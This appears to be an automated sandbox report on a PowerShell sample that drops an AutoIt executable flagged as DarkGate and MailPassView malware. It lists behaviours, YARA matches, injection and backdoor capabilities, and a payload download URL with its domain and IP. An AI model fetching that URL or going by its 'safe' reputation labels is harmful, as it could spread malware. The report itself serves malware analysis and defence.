Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\downloads\Autoit3.exe Code function: 3_2_00840030 GetLocalTime,__swprintf, 3_2_00840030
Source: C:\downloads\Autoit3.exe Code function: 3_2_00840722 GetUserNameW, 3_2_00840722
Source: C:\downloads\Autoit3.exe Code function: 3_2_0083416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 3_2_0083416A
Source: C:\downloads\Autoit3.exe Code function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 3_2_00815D13
AV process strings found (often used to terminate AV products)
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: superantispyware.exe

Stealing of Sensitive Information
barindex
Yara detected DarkGate
Source: Yara match File source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: Autoit3.exe Binary or memory string: WIN_81
Source: Autoit3.exe Binary or memory string: WIN_XP
Source: Autoit3.exe Binary or memory string: WIN_XPe
Source: Autoit3.exe Binary or memory string: WIN_VISTA
Source: Autoit3.exe Binary or memory string: WIN_7
Source: Autoit3.exe Binary or memory string: WIN_8
Source: Autoit3.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected DarkGate
Source: Yara match File source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\downloads\Autoit3.exe Code function: 3_2_0087696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 3_2_0087696E
Source: C:\downloads\Autoit3.exe Code function: 3_2_00876E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_00876E32
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CDB420 bind, 3_2_03CDB420
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448082 Sample: oxi.ps1 Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 29 kostumn1.ilabserver.com 2->29 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 9 powershell.exe 14 41 2->9         started        signatures3 process4 dnsIp5 31 kostumn1.ilabserver.com 167.235.238.203, 443, 49730 ALBERTSONSUS United States 9->31 27 C:\downloads\Autoit3.exe, PE32 9->27 dropped 41 Uses ipconfig to lookup or modify the Windows network settings 9->41 43 Found suspicious powershell code related to unpacking or dynamic code loading 9->43 45 Loading BitLocker PowerShell Module 9->45 47 Powershell drops PE file 9->47 14 Autoit3.exe 4 9->14         started        17 conhost.exe 9->17         started        19 ipconfig.exe 1 9->19         started        file6 signatures7 process8 signatures9 49 Machine Learning detection for dropped file 14->49 51 Contains functionality to inject threads in other processes 14->51 53 Contains functionality to inject code into remote processes 14->53 21 cmd.exe 2 14->21         started        process10 process11 23 WMIC.exe 1 21->23         started        25 conhost.exe 21->25         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
167.235.238.203
 kostumn1.ilabserver.com United States
3525 ALBERTSONSUS false

Contacted Domains

Name IP Active
kostumn1.ilabserver.com 167.235.238.203 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://kostumn1.ilabserver.com/1.zip false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown